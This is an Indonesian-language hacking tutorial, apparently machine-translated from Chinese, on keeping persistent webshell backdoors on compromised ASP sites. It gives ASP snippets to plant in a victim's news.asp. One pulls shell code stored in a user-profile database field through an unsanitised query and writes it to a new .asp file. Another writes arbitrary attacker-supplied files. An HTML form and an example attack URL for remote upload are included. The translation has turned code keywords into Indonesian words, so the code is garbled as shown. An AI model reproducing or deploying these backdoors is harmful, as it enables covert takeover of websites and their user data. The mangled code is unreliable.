Kata Pengantar: Sudah lama sekali, dari pengelola situs awal hingga beberapa pintu belakang ASP yang populer sekarang. Saya yakin sebagian besar administrator jaringan dapat memberi nama webshell klasik ini, seperti Haiyang, Veteran, Blue Screen, dll. administrator jaringan dapat menyebutkan nama mereka. Saya mempelajari metode pencarian kata kunci untuk mencari Trojan ini. Tentu saja, jika Anda ingin menyembunyikan pintu belakang di zaman sekarang, Anda perlu menggunakan beberapa keterampilan tinggi, dan tinggiku satu kaki."
Saya tidak menyangkal bahwa menulis asp Trojan ke dalam file gambar seperti yang disebutkan sebelumnya adalah metode yang baik, sebenarnya tidak hanya dapat ditulis ke dalam gambar, tetapi juga ke dalam file mp3 dan ke dalam file doc.
Metodemenyalin nama file/parameter + nama file/parameter untuk menghasilkan nama file
dapat digunakan secara fleksibel untuk mencapai tujuan menyembunyikan file. Parameter spesifiknya adalah /a dalam mode kode acsic, /b dalam mode biner, jadi saya menang' Jangan membahas terlalu detail. Mengenai cara mengupload webshell, apa itu webshell tidak termasuk dalam cakupan artikel ini. Yang akan kita bicarakan hari ini adalah bagaimana cara memasukkan backdoor ke dalam database dengan akhiran .mdb. Premisnya adalah setelah kita mendapatkan webshell...
Seperti yang kita ketahui, banyak situs yang harus mengisi banyak hal ketika pengguna mendaftar, seperti: nama pengguna, Kata Sandi, QQ, email, profil pribadi, nomor telepon, informasi kontak, alamat, dll. Juga akan ada tabel, bidang, dan nilai yang sesuai dengan database. Yang ingin saya lakukan hari ini adalah mendaftarkan pengguna dan menulis kode shell di profil pribadi saya, lalu memodifikasi file di situsnya. Ketika file ini terpicu saat menggunakannya, saya akan memasukkan kode shell ke dalam resume pribadi saya hingga direktori saat ini.
Tanpa basa-basi lagi, mari kita lihat kodenya:
<%
jika permintaan("action")="firefox" maka
fname=permintaan.querystring("fn")
tname=permintaan.querystring("tn")
bname=permintaan.querystring("bn")
id=permintaan.querystring("id")
nilaiid=permintaan.querystring("idv")
set rs=server.createobject("ADODB.recordset")
sql="pilih "& bname & " dari "&tname& " di mana "&id&"="&idvalue&""""
rs.open sql,sambungan,1,3
jika bukan rs.eof maka
konten=rs(namab)
kalau tidak
respon.tulis "Tidak ada"
berakhir jika
set fso=Server.createObject("Scripting.FileSystemObject")
setel txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(konten)
txtfile.close
berakhir jika
%>
Tambahkan kode di atas ke file di situs, misalnya news.asp. Menurut informasi yang kami ketahui, setelah mendaftar di situsnya, unduh databasenya untuk melihat strukturnya. Nama firefox yang saya daftarkan ada di tabel user, dan nilai id-nya adalah 119. Field tabel yang digunakan untuk menyimpan resume terdaftar saya adalah jl.
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
Kemudian ketika menggunakannya, kita dapat menulis webshell bernama firefox.asp di direktori yang sama dengan news.asp. Cara di atas bisa dikatakan sebagai salah satu dari ribuan metode penyembunyian. Selanjutnya mari kita bahas tentang cara penyembunyian lain yang lebih nyaman. Metode ini tidak ada hubungannya dengan akhiran mdb.
Demikian pula, kami masih memodifikasi news.asp dan memasukkan kode berikut ke news.asp pihak lain:
<%
jika permintaan("action")="firefox" maka
n=permintaan.formulir("n")
c=permintaan.formulir("c")
set fso=Server.createObject("Scripting.FileSystemObject")
setel txtfile=fso.createtextfile(server.mappath(n))
file txt.writeline(c)
txtfile.close
berakhir jika
%>
Kode ini relatif sederhana, dapat dianggap sebagai sisi server dari kuda Troya. Gunakan kode ini saat menggunakannya:
<HTML><KEPALA>
<META http-equiv=Jenis Konten content="text/html; charset=gb2312">
<title>Aliansi Teknologi Firefox Pertama[www.wrsky.com]</title>
<FORM aksi=" http://localhost/config.asp?action ... metode=post>
<META content="MSHTML 6.00.2900.2180" nama=GENERATOR></HEAD>
<BODY>Nama:<Ukuran INPUT=50
name=n width="32"><BR><BR>Shell:<TEXTAREA name=c baris=10 cols=80
width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>
Ubah kode di atas: "http://localhost/config.asp?action= Ganti "firefox" dengan alamat server Anda dan simpan sebagai file .htm lokal. Setelah membukanya secara lokal, tentukan nama file, konten file, dan pengiriman jarak jauh yang akan dibuat. Oke, ini adalah cara lain untuk keluar dari pintu belakang.